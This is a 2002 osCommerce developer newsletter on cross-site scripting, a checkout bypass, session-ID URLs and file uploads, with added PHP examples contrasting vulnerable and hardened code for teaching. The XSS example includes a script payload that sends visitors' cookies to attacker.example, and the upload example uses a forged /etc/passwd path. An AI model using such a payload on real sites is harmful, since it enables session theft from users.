Issue #10: August 19, 2002

By Harald Ponce de Leon

Cross Site Scripting Vulnerabilities
Checkout And Order Security Issues
Search Engine Safe URLs
PHP3 Compatibility
Windows Date Problem Readdressed
Installation Module Updates For PHP-CGI Servers
Who's Online Logic Update
File Upload Standards

Cross Site Scripting Vulnerabilities

Tamura Toshihiko reported on the developers forum cross-site scripting vulnerabilities in the 2.2-CVS codebase.

The posting can be read at:

https://www.oscommerce.com/community.php/forum,2/action,read/i,16332/t,16332

Fixes to the affected areas have been committed, but we are still working on a complete solution that validates all user input.

Mattice has submitted a global fix which can be used on live stores, which can be read at:

https://www.oscommerce.com/community.php/forum,2/action,read/i,16432/t,16432
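
The kind of flaw described here, as an added example that is not osCommerce code and not the committed fix: a request parameter echoed straight into the page, beside the same page with output encoding and input validation. The page name, the "keywords" parameter and all function names are illustrative, and the code uses PHP 7 syntax rather than that of the 2002 codebase.

```php
<?php
// Added illustrative example, not osCommerce code. Shows the reflected
// cross-site scripting pattern this section refers to (a request parameter
// echoed into HTML) and the two layers that close it: encoding at the point
// of output, and validating input on the way in. The parameter name
// "keywords", the page name and all function names are assumptions.

// Vulnerable: the request value is concatenated straight into markup, so a
// value such as "><script>...</script> breaks out of the attribute.
function render_search_form_vulnerable(array $get): string
{
    $keywords = isset($get['keywords']) ? $get['keywords'] : '';
    return '<input type="text" name="keywords" value="' . $keywords . '">'
         . '<p>Results for ' . $keywords . '</p>';
}

// Output encoding for an HTML body or attribute context. ENT_QUOTES also
// converts single quotes, so the helper is safe inside '...' attributes.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Output encoding for a URL query component: a different context needs a
// different encoder, and HTML escaping alone is wrong inside a href.
function url_param(string $name, string $value): string
{
    return rawurlencode($name) . '=' . rawurlencode($value);
}

// Input validation: the page only expects a short search phrase.
function validate_keywords($raw): string
{
    if (!is_string($raw)) {          // keywords[]=x arrives as an array; refuse it
        return '';
    }
    $keywords = trim($raw);
    if (strlen($keywords) > 100) {
        $keywords = substr($keywords, 0, 100);
    }
    return $keywords;
}

// Hardened: validated on input, encoded for each output context.
function render_search_form_safe(array $get): string
{
    $keywords = validate_keywords(isset($get['keywords']) ? $get['keywords'] : '');
    $next = 'search_result.php?' . url_param('keywords', $keywords);
    return '<input type="text" name="keywords" value="' . html_escape($keywords) . '">'
         . '<p>Results for ' . html_escape($keywords) . '</p>'
         . '<a href="' . html_escape($next) . '">next page</a>';
}

// Constructed attacker input, as a crafted link would deliver it.
$payload = '"><script>document.location="http://attacker.example/?c="+document.cookie</script>';

// The vulnerable page emits the script tag as live markup; the hardened page
// emits it as visible text and as an encoded query value.
echo render_search_form_vulnerable(['keywords' => $payload]), "\n\n";
echo render_search_form_safe(['keywords' => $payload]), "\n";
```

Input validation limits what reaches the page, but it is the output encoding that makes the echoed value inert, and the encoder must match the context (HTML body, attribute, URL) the value is written into.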

Checkout And Order Security Issues

Geoff Ford forwarded issues concerning the checkout procedure and how orders are created. A customer can bypass the checkout steps and request the order-processing logic directly, creating false orders.

This issue is most serious for stores offering downloadable products, which may become available to the customer as soon as an order has been falsely created.

A fix to the problem has been committed, which can be seen here:

https://marc.theaimsgroup.com/?l=tep-commits&m=102975528416119&w=2
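
The checkout bypass described above, as an added example that is not the committed osCommerce fix: a model of the order-processing entry point that a customer could request directly, with the server-side state checks that make a direct request fail, plus a single-use confirmation token so the processing request cannot be replayed. Session keys, page names and function names are assumptions; the code needs PHP 7.1 or later.

```php
<?php
// Added illustrative example, not the committed osCommerce fix. Models the
// order-processing step as a function that refuses to write an order unless
// every earlier checkout step was completed in this session. Session keys,
// page names and function names are assumptions.

// Returns the page the customer must be sent back to, or null when every
// earlier checkout step has actually been completed in this session.
function checkout_redirect_target(array $session, int $cart_items): ?string
{
    if (empty($session['customer_id'])) {
        return 'login.php';                 // not logged in
    }
    if ($cart_items < 1) {
        return 'shopping_cart.php';         // nothing to order
    }
    if (empty($session['shipping'])) {
        return 'checkout_shipping.php';     // shipping step skipped
    }
    if (empty($session['payment'])) {
        return 'checkout_payment.php';      // payment step skipped
    }
    if (empty($session['confirm_token'])) {
        return 'checkout_confirmation.php'; // confirmation page never shown
    }
    return null;
}

// Called by the confirmation page: issues a single-use token that the
// processing step must present, so the processing URL cannot be replayed.
function issue_confirm_token(array &$session): string
{
    $token = bin2hex(random_bytes(16));
    $session['confirm_token'] = $token;
    return $token;
}

// The processing step. $session stands in for $_SESSION, $post for $_POST,
// $cart_items for the cart's item count; $create_order is the callback that
// writes the order and, for downloadable products, the download entitlement,
// so entitlements can only ever be created through this checked path.
// Returns ['redirect' => page] or ['order_id' => id].
function process_order(array &$session, array $post, int $cart_items, callable $create_order): array
{
    $target = checkout_redirect_target($session, $cart_items);
    if ($target !== null) {
        return ['redirect' => $target];
    }
    // The presented token must match the one the confirmation page issued.
    // hash_equals avoids a timing side channel on the comparison.
    $presented = isset($post['confirm_token']) ? (string)$post['confirm_token'] : '';
    if (!hash_equals($session['confirm_token'], $presented)) {
        return ['redirect' => 'checkout_confirmation.php'];
    }
    // Consume the token before writing, so a resubmitted request cannot
    // create a second order.
    unset($session['confirm_token']);
    $order_id = $create_order($session);
    unset($session['shipping'], $session['payment']);
    return ['order_id' => $order_id];
}

// Constructed scenarios. The stand-in order writer only counts orders.
$orders_written = 0;
$writer = function (array $session) use (&$orders_written): int {
    $orders_written++;
    return 1000 + $orders_written;
};

// 1. Direct request with an empty session: bounced to login, nothing written.
$anon = [];
var_dump(process_order($anon, [], 0, $writer));

// 2. Logged in with items, but shipping and payment never chosen: bounced.
$partial = ['customer_id' => 7];
var_dump(process_order($partial, [], 2, $writer));

// 3. Full flow: the confirmation page issued a token and the processing
//    step receives it, so an order is written.
$full = ['customer_id' => 7, 'shipping' => 'flat', 'payment' => 'cod'];
$token = issue_confirm_token($full);
var_dump(process_order($full, ['confirm_token' => $token], 2, $writer));

// 4. Replaying the same request after the order exists: bounced, because the
//    token was consumed and the checkout state cleared; the count stays at one.
var_dump(process_order($full, ['confirm_token' => $token], 2, $writer));
echo "orders written: $orders_written\n";
```

The point of the model is that the processing step trusts nothing about how it was reached: every precondition is re-checked against server-side session state, and the download entitlement is only created inside that checked path.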

Search Engine Safe URLs

The Search Engine Safe URLs logic has been updated to properly parse all GET parameters, including the session ID where necessary.

This update may cause robots to cycle through a live store: each crawler request that carries no session cookie receives a fresh session ID embedded in every link, so the crawler keeps finding new URLs. We are currently discussing possible solutions to overcome this issue.

One nice solution mentioned is to start the session only when it is needed, for example when adding a product to the cart, and when a customer logs in or creates an account.
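
The two ideas in this section, as an added example that is not osCommerce's own session or URL code: parsing a search-engine-safe URL back into GET parameters with the session ID separated out, and starting the session only on the actions that need one, so that a crawler that never logs in or adds to the cart is never handed a session ID. The session name "osCsid", the path layout, the action names and all function names are assumptions; the code needs PHP 7.1 or later.

```php
<?php
// Added example, not osCommerce code. Illustrates parsing a search-engine-
// safe URL (parameters carried in the path) and starting a session lazily.
// Session name, path layout, action names and function names are assumed.

const SESSION_NAME = 'osCsid';

// Search-engine-safe form: /page.php/key1/value1/key2/value2 instead of
// /page.php?key1=value1&key2=value2. Returns [script, params, session id].
function parse_ses_url(string $path): array
{
    $parts = explode('/', trim($path, '/'));
    $script = array_shift($parts);
    $params = [];
    for ($i = 0; $i + 1 < count($parts); $i += 2) {
        $params[rawurldecode($parts[$i])] = rawurldecode($parts[$i + 1]);
    }
    // A session ID arriving in the path is parsed like any other parameter
    // and then separated out, so it is never mistaken for page data.
    $sid = null;
    if (isset($params[SESSION_NAME])) {
        $sid = $params[SESSION_NAME];
        unset($params[SESSION_NAME]);
    }
    return [$script, $params, $sid];
}

// Only accept a session ID that looks like one the server generated; anything
// else is dropped, so a crafted link cannot fix the visitor's session ID.
function acceptable_session_id(?string $sid): bool
{
    return $sid !== null && preg_match('/^[A-Za-z0-9,-]{22,128}$/', $sid) === 1;
}

// A session is started for a request only when it will be used: the visitor
// already has one (cookie or validated URL ID), or the requested action
// creates state worth keeping.
function session_needed(string $action, bool $has_cookie, ?string $url_sid): bool
{
    if ($has_cookie || acceptable_session_id($url_sid)) {
        return true;
    }
    return in_array($action, ['add_product', 'login', 'create_account'], true);
}

// Builds a search-engine-safe link, appending the session ID only while a
// session exists and the browser has not yet returned the session cookie.
function build_link(string $script, array $params, ?string $sid, bool $cookie_seen): string
{
    if ($sid !== null && !$cookie_seen) {
        $params[SESSION_NAME] = $sid;
    }
    $path = $script;
    foreach ($params as $k => $v) {
        $path .= '/' . rawurlencode((string)$k) . '/' . rawurlencode((string)$v);
    }
    return $path;
}

// Constructed requests.
[$script, $params, $sid] = parse_ses_url('/product_info.php/products_id/27/osCsid/abcd1234abcd1234abcd1234');
var_dump($script, $params, $sid);

// A crawler fetching a product page: no cookie, no valid ID, read-only
// action, so no session is created and its links stay stable.
var_dump(session_needed('view', false, null));

// The same visitor adding to the cart: a session is created now.
var_dump(session_needed('add_product', false, null));

// A link for a visitor with a session whose cookie has not come back yet
// carries the ID; once the cookie is seen, the ID is left out.
echo build_link('product_info.php', ['products_id' => 27], $sid, false), "\n";
echo build_link('product_info.php', ['products_id' => 27], $sid, true), "\n";
```

Deferring session creation removes the crawler loop for read-only browsing; validating any ID that arrives in the URL is the companion check, since a session ID in the path is otherwise an invitation to session fixation.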

PHP3 Compatibility

Updates to the code logic have been made to restore PHP3 compatibility. The estimated minimum PHP3 version is 3.0.7; the compatibility tests were done on 3.0.11, the earliest version found for Windows servers.

Windows Date Problem Readdressed

Michael Burke has forwarded an update to the logic used for parsing dates prior to 1970 on Windows-based servers.

Dates prior to 1970 should now be displayed correctly.

Installation Module Updates For PHP-CGI Servers

The installation module has been updated to allow for easier installation on servers that have PHP set up as CGI.

If you encounter any problems with the provided default path parameters during the installation procedure, please forward relevant information to the developers forum.

Who's Online Logic Update

The logic of the Who's Online feature has been updated to use only the necessary session variables from the customer on the catalog side.

Previously, if the customer was viewing the store in a foreign language, selecting their entry in Who's Online would apply that language variable to the Administration Tool itself.

The logic calculating the customer's shopping cart total has also been updated to calculate the right tax amount if display_price_with_tax is enabled. The [sub]total shown is exactly the price shown to the customer in their shopping cart box.

File Upload Standards

A new standard has been defined for file upload processing, compatible with all PHP versions while taking advantage of the features available in the PHP version in use.

The API documentation for this standard will soon be added to the CVS repository.
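
One way to handle an upload across PHP versions, as an added example that is not the standard the newsletter announces (the newsletter does not describe it): read the file entry from $_FILES where that superglobal exists, fall back to the older $HTTP_POST_FILES array, and apply the same checks on every version. It is written without type declarations so it runs on old and current PHP alike; the field name, destination directory and extension list are assumptions.

```php
<?php
// Added example, not osCommerce's upload standard. Shows version-neutral
// access to the upload entry and the checks that matter on any version.
// Field name, destination directory and the extension list are assumed.

// Returns the upload entry for a form field on any PHP version, or null.
function upload_info($field)
{
    if (isset($_FILES[$field])) {
        return $_FILES[$field];
    }
    if (isset($GLOBALS['HTTP_POST_FILES'][$field])) {   // PHP before 4.1
        return $GLOBALS['HTTP_POST_FILES'][$field];
    }
    return null;
}

// Validates one upload entry and moves it into $dest_dir.
// Returns array(true, stored_path) or array(false, reason).
function store_upload($file, $dest_dir, $allowed_ext, $max_bytes)
{
    // 'error' only exists from PHP 4.2 on; when present it must be clean.
    if (isset($file['error']) && $file['error'] != 0) {
        return array(false, 'upload failed, error code ' . $file['error']);
    }
    // Only trust a file PHP itself received in this request. An entry that
    // names some other path on the server (a request field, or with
    // register_globals a form field) is refused here.
    if (!isset($file['tmp_name']) || !is_uploaded_file($file['tmp_name'])) {
        return array(false, 'not a file received by this request');
    }
    if (!isset($file['size']) || $file['size'] > $max_bytes) {
        return array(false, 'file too large');
    }
    // The client-supplied name is used only to pick the extension; the
    // stored name is generated, so "../" or an existing file name in the
    // original name cannot place or overwrite anything.
    $name = isset($file['name']) ? $file['name'] : '';
    $dot = strrpos($name, '.');
    $ext = $dot === false ? '' : strtolower(substr($name, $dot + 1));
    if (!in_array($ext, $allowed_ext)) {
        return array(false, 'extension not allowed: ' . $ext);
    }
    $target = rtrim($dest_dir, '/') . '/' . md5(uniqid(mt_rand(), true)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        return array(false, 'could not store file');
    }
    chmod($target, 0644);   // stored as data, never executable
    return array(true, $target);
}

// Constructed demonstration (no HTTP request involved): an entry that names a
// path the server already holds as its "temporary file". PHP did not receive
// that file in this request, so is_uploaded_file() refuses it and nothing
// is moved.
$forged = array(
    'name'     => 'photo.jpg',
    'type'     => 'image/jpeg',
    'tmp_name' => '/etc/passwd',
    'size'     => 1024,
    'error'    => 0,
);
list($ok, $detail) = store_upload($forged, sys_get_temp_dir(), array('jpg', 'png', 'gif'), 2000000);
echo $ok ? "stored at $detail\n" : "rejected: $detail\n";

// In a real handler the entry comes from the request instead:
// $file = upload_info('product_image');
```

The version detection is the small part; the checks that hold on every version are that the file really came from this request, that its name is generated rather than taken from the client, and that it is stored as data only.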
